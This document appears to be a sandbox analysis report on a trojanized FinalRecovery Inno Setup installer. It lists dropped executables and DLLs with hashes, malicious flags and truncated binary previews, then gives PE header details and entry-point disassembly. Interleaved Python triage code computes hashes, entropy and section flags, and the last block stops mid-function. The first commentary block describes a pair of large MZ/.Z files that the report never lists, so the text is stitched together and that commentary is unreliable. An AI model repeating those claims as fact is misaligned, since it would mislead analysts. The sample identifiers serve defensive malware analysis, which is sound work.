              Preview:ITSF....`.......&..u.......|.{.......".....|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):791040
              Entropy (8bit):6.608982798504157
              Encrypted:false
              SSDEEP:24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
              MD5:5C2FE7D4DDE65810152054F3C93C1815
              SHA1:2A19F3FAA78A5072068F7902DB19A248F11FA69B
              SHA-256:233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              SHA-512:2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:InnoSetup Log FgasoftFR FinalRecovery, version 0x30, 4340 bytes, 701188\user, "C:\Program Files (x86)\FgasoftFR\FinalRecovery"
              Category:dropped
              Size (bytes):4340
              Entropy (8bit):4.710584129714836
              Encrypted:false
              SSDEEP:96:WyWx5pJU+oIahqwOIhdc87ICSss/LBtbgfjf:WyWx5pJU+KEIhZICSsATgfr
              MD5:3B5506D7E7E0F3FF3FD02721245AB513
              SHA1:2F37FA895A32EA49673C61411FCB373ACDD91CD4
              SHA-256:699BD1692AA255B3291F6ECD60B5B7AB512CE10CB008B2CBD18F8B12A166D01C
              SHA-512:47EF21909EDB36900B14F100DCC9BBFECBF7B2482AFAFD232093D92C41FF440160B924D1B582B5FBC960A0F35EBA99C6479707E5F244B601F6D770CAECFA79EC
              Malicious:false
              Preview:Inno Setup Uninstall Log (b)....................................FgasoftFR FinalRecovery.........................................................................................................FgasoftFR FinalRecovery.........................................................................................................0...........%.................................................................................................................Wc(.......=.y0......N....701188.user.C:\Program Files (x86)\FgasoftFR\FinalRecovery.................. ..........b.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):723230
              Entropy (8bit):6.49191904892708
              Encrypted:false
              SSDEEP:12288:1QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kSW:WtCUA4arPEn37TzH7A6nw9yzeESUFWHF
              MD5:D0E4493CD1CEC1B97F24BAB12A942543
              SHA1:CEE352F43F982FCB36A337D2C15FFDD28B04B80D
              SHA-256:C5851530669107DF77FD7079EC7C6F0C668003D6094643D6E723FB74F1DEB5D9
              SHA-512:D2A02702AEDE0509AC81785DBECBA312CABD6D83E064DCAA7E95B43FF4E373D538327539290288CED6A6837F44819A6A7CCC912285E5E1407F9B79C086B6C58F
              Malicious:true
              Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:data
              Category:dropped
              Size (bytes):95248
              Entropy (8bit):7.998277474001343
              Encrypted:true
              SSDEEP:1536:1ajIVNDkCngyeaL3ZC7cjgn35QgjaeiPr6idOZAkOLfTRCaLQhAboaAkepTXnkY5:1vVpj3ZC72gnJQg2eikik4FC9/RX+f6
              MD5:636E3CA21F2541B5EE3AB9922A183C79
              SHA1:4B98C5432E534AF5FA17424C907E61CCFA6880D9
              SHA-256:9B97BF40465ACFBAB5D61EE45ECAC1E485A988ADC66E1A859F950605DC5677B9
              SHA-512:6AA99DFAB439063332383EBA737F34A5929353794245E8E4469EAEB2F7055889891D5A3F3CD3C9F20E37DCDEBFA78C5B5749F3BFDF40263970C880F047A0BDBB
              Malicious:false
              Preview:..'m..h.f{Q{..7_....l../....3`.p.$.....]....~@..Vt.%..eB.9a../_...G...|.O..0HG`......`... k..x#.).....W..n...;.vmN....T..:l...........37r.../..X.1,..)..^.Y....N.{8........=..R..E.z.c..G.~X.0.}.b....rE..d...........(...M`.O.Y....?....D...R....N...C.{..E.\i.......:.h...#..\...d...*O.."..N.yw.2.$..L.{....[w\....v.....zm....9.|.q...p....j.WfQ.5h^rY.r.-..^}g.......]%...El.98Q..5F).F...).KBD..<0..l7...:..!.....L..P.l..oV....h..~;.G..K....-..={.....U.%...~.(.DE..8..df./...n...FC....~#.`.a........B.r..OJ^-...$.(`...N..*k....P..h.....+.o...W.m.0...&j...E...Sip..p...U..Qx...q.[.."......U..n|.Me_...PT.|c.wt....5l...'..f..6n..,.+....4*....J.\..+..\..C...:1.u..l.h...n.6..5P.-/........m70D..D._....?..9.*V...M8..m.T.]4.i.IQN....BV..."h.......f......V.(..W..H.`,.V`..l.;...}.@.......*..rD....6OP.OC#^......=^7.R...tx..Q<..J..o.n..q.O..f.F....).Y2v..I...g.lnV.X..sm.>....^eO.l.....EB...u.m.E.|.X...)b 7.K.ma."..%t..p.....U\.....L..A.:._.@...c3..[.m...
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):21
              Entropy (8bit):3.975418017913833
              Encrypted:false
              SSDEEP:3:iIxcsJE:iyE
              MD5:C0236A8F8EB0411CC373CD432E252990
              SHA1:49CA519830FADD97FA7BFB7C3404ED2DB29DF4E0
              SHA-256:375CD2A305050C0ECDC8EF9A417194DB2955F3C99B04C76F1B2CD5A88369A242
              SHA-512:3EDFDF13D9AE53C3DC77B299137C7F318B689F4880D72E50CF037F5A4F5C2A6CBC24CB5FE557C10F458CD1658B65E27EF994794FAB2D8E1562694E7DE5039E7E
              Malicious:false
              Preview:kvQoRqtcCyMtHmQyQXOUu
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:V:V
              MD5:CFCD208495D565EF66E7DFF9F98764DA
              SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
              SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
              SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
              Malicious:false
              Preview:0
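The fields above (size, 8-bit entropy, the "Encrypted" flag, MD5/SHA-1/SHA-256/SHA-512) can be recomputed locally to confirm a suspected dropped file is the one listed here. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It reproduces the entropy and hash values shown for the 1-byte "0" files and the 21-byte ASCII file, and also models the pair of 1327101-byte files listed earlier in this section, where the "modified" copy previews as "MZ" and the "dropped" copy as ".Z": a one-byte change at offset 0 yields different MD5/SHA digests and a "data" file type while leaving the entropy essentially unchanged. The 7.9 bits/byte threshold used for "encrypted" and the minimal PE layout are assumptions for illustration, not the sandbox's actual rules.

```python
"""Recompute sandbox-style triage fields (hashes, entropy, PE check) for a blob.

Added example; not code from the Joe Sandbox report or its vendor.
Assumptions (not taken from the report):
  - "Encrypted" is approximated as entropy >= ENTROPY_ENCRYPTED_THRESHOLD.
  - The PE check only validates the 'MZ' signature and 'PE\\0\\0' at e_lfanew.
"""
import hashlib
import math
import struct
from collections import Counter

ENTROPY_ENCRYPTED_THRESHOLD = 7.9  # assumption, not the sandbox's real rule


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte; 0.0 for empty or single-valued input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the report lists."""
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "sha512": hashlib.sha512(data).hexdigest().upper(),
    }


def is_pe(data: bytes) -> bool:
    """True if data starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(data: bytes) -> dict:
    """One record in the shape of a 'dropped file' entry."""
    ent = shannon_entropy_8bit(data)
    return {
        "size": len(data),
        "entropy": ent,
        "encrypted": ent >= ENTROPY_ENCRYPTED_THRESHOLD,
        "pe": is_pe(data),
        **hashes(data),
    }


def minimal_pe_image() -> bytes:
    """Constructed stand-in for a PE file: MZ header, e_lfanew=0x40, PE signature, padding."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00" + bytes(0x100)


def damaged_first_byte(data: bytes) -> bytes:
    """Overwrite byte 0 (the 'M' of 'MZ'), mirroring the report's '.Z' preview."""
    return b"." + data[1:]


if __name__ == "__main__":
    # Constructed inputs: the two tiny files from the report and a synthetic PE pair.
    samples = {
        "one-byte '0' file": b"0",
        "21-byte ASCII file": b"kvQoRqtcCyMtHmQyQXOUu",
        "intact PE (MZ)": minimal_pe_image(),
        "first byte damaged (.Z)": damaged_first_byte(minimal_pe_image()),
    }
    for label, blob in samples.items():
        rec = triage(blob)
        print(f"{label}: size={rec['size']} entropy={rec['entropy']:.6f} "
              f"pe={rec['pe']} encrypted={rec['encrypted']} md5={rec['md5']}")
```

Run it against a file pulled from the sandbox's dropped-file archive (read it in binary mode and pass the bytes to `triage`) and compare the digests with the entry above; a mismatch on MD5 but a near-identical ssdeep and entropy, as with the MZ/.Z pair in this section, usually means a small edit to the same image rather than a different payload.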
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):4096
              Entropy (8bit):4.026670007889822
              Encrypted:false
              SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
              MD5:0EE914C6F0BB93996C75941E1AD629C6
              SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
              SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
              SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):2560
              Entropy (8bit):2.8818118453929262
              Encrypted:false
              SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
              MD5:A69559718AB506675E907FE49DEB71E9
              SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
              SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
              SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32+ executable (console) x86-64, for MS Windows
              Category:dropped
              Size (bytes):6144
              Entropy (8bit):4.215994423157539
              Encrypted:false
              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
              MD5:4FF75F505FDDCC6A9AE62216446205D9
              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):23312
              Entropy (8bit):4.596242908851566
              Encrypted:false
              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\file.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):712704
              Entropy (8bit):6.4837542632664515
              Encrypted:false
              SSDEEP:12288:9QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kS0:+tCUA4arPEn37TzH7A6nw9yzeESUFWH/
              MD5:D76329B30DB65F61D55B20F36B56DA26
              SHA1:5E4C77B723AE8F05B3AE6AFEEE735A4355F00663
              SHA-256:229FBCB11EE7D1F082B6411610E95F726EEC4E6737E6B6392719DF4F0FE3FA1D
              SHA-512:A291AED0897315E88B6378B1DB10ADA05BDA8C1ECCAF73DE23F409FE61860EBD1DBB422063E00996584D3B4B100122931D5BBAB54A88951706D75EFCC660F70D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 2%
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):73728
              Entropy (8bit):6.20389308045717
              Encrypted:false
              SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
              MD5:3FB36CB0B7172E5298D2992D42984D06
              SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
              SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
              SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 60%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.993082674497476
              TrID:
              • Win32 Executable (generic) a (10002005/4) 98.86%
              • Inno Setup installer (109748/4) 1.08%
              • Win16/32 Executable Delphi generic (2074/23) 0.02%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              File name:file.exe
              File size:1825141
              MD5:209dca1a9633807b9cf36d6447f972da
              SHA1:c4235ac91cd8e3c0e70ede54e43f857709f00859
              SHA256:2004da2c60d73a66c6feffe50f130483750da799b90a78c76da90f61208101e6
              SHA512:d965feebe07c36d6e5b2b465a3639423c64ed293dde059e130c6586145d547745ed53bfcd9e3085f9d176960b746892efe5aea526aebf647609894f30a257295
              SSDEEP:49152:ZLlc1oFvcnMNVYwUblC5LPUuQ6iArG7WUD8aXBCLCgv2MR:TzvcMjzcJ/qqTDLBqv2MR
              TLSH:DD8533454E82D871E0236D76583E81DACD77BF2B247471402B4CFB9E37EB2D6920AB91
              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
              Icon Hash:a2a0b496b2caca72
              Entrypoint:0x409c18
              Entrypoint Section:CODE
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:1
              OS Version Minor:0
              File Version Major:1
              File Version Minor:0
              Subsystem Version Major:1
              Subsystem Version Minor:0
              Import Hash:884310b1928934402ea6fec1dbd3cf5e
              Instruction
              push ebp
              mov ebp, esp
              add esp, FFFFFFC4h
              push ebx
              push esi
              push edi
              xor eax, eax
              mov dword ptr [ebp-10h], eax
              mov dword ptr [ebp-24h], eax
              call 00007F2B449DEA43h
              call 00007F2B449DFC4Ah
              call 00007F2B449DFED9h
              call 00007F2B449E1EE8h
              call 00007F2B449E1F2Fh
              call 00007F2B449E485Eh
              call 00007F2B449E49C5h
              xor eax, eax
              push ebp
              push 0040A2D4h
              push dword ptr fs:[eax]
              mov dword ptr fs:[eax], esp
              xor edx, edx
              push ebp
              push 0040A29Dh
              push dword ptr fs:[edx]
              mov dword ptr fs:[edx], esp
              mov eax, dword ptr [0040C014h]
              call 00007F2B449E542Bh
              call 00007F2B449E505Eh
              lea edx, dword ptr [ebp-10h]
              xor eax, eax
              call 00007F2B449E2518h
              mov edx, dword ptr [ebp-10h]
              mov eax, 0040CDE8h
              call 00007F2B449DEAEFh
              push 00000002h
              push 00000000h
              push 00000001h
              mov ecx, dword ptr [0040CDE8h]
              mov dl, 01h
              mov eax, 00407364h
              call 00007F2B449E2DA7h
              mov dword ptr [0040CDECh], eax
              xor edx, edx
              push ebp
              push 0040A255h
              push dword ptr fs:[edx]
              mov dword ptr fs:[edx], esp
              call 00007F2B449E549Bh
              mov dword ptr [0040CDF4h], eax
              mov eax, dword ptr [0040CDF4h]
              cmp dword ptr [eax+0Ch], 01h
              jne 00007F2B449E55DAh
              mov eax, dword ptr [0040CDF4h]
              mov edx, 00000028h
              call 00007F2B449E31A8h
              mov edx, dword ptr [000000F4h]
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              CODE | 0x1000 | 0x933c | 0x9400 | False | 0.6138883023648649 | data | 6.557291120606636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              DATA | 0xb000 | 0x24c | 0x400 | False | 0.3134765625 | data | 2.7679914923058866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              BSS | 0xc000 | 0xe4c | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata | 0xd000 | 0x950 | 0xa00 | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls | 0xe000 | 0x8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata | 0xf000 | 0x18 | 0x200 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .reloc | 0x10000 | 0x8b4 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .rsrc | 0x11000 | 0x2c00 | 0x2c00 | False | 0.32421875 | data | 4.466554376757956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
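              The section table above is what a reviewer reads first when a sample is flagged for unpacking: which sections carry no raw data and are filled at load time (BSS, .tls, .reloc here), which are writable and executable, and which have near-maximal entropy. The following is an added example, written for this page and not code from the Joe Sandbox report, that parses a PE section table with only the Python standard library and recomputes those fields. The image it parses is constructed inline by build_sample_pe(); it borrows the CODE/DATA/BSS addresses and sizes from the table but is not the analysed file, and its extra ".rwx" section is invented to exercise the writable-and-executable check.

```python
"""Added example (not code from the Joe Sandbox report): parse a PE section
table with the standard library, recompute the per-section fields the report
shows (virtual/raw size, entropy, characteristics) and flag what a reviewer
checks first. build_sample_pe() constructs a minimal PE32 image inline; the
CODE/DATA/BSS entries mimic the table above, ".rwx" is invented.
"""
from __future__ import annotations

import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list[dict]:
    """Walk DOS header -> PE signature -> IMAGE_FILE_HEADER -> section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_header = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    num_sections = struct.unpack_from("<H", pe, file_header + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, file_header + 16)[0]
    first = file_header + 20 + size_of_optional     # IMAGE_SECTION_HEADER[], 40 bytes each
    sections = []
    for i in range(num_sections):
        off = first + i * 40
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        characteristics = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "characteristics": characteristics,
        })
    return sections


def triage(pe: bytes) -> dict[str, list[str]]:
    """Map each section name to the warnings a reviewer would raise for it."""
    out = {}
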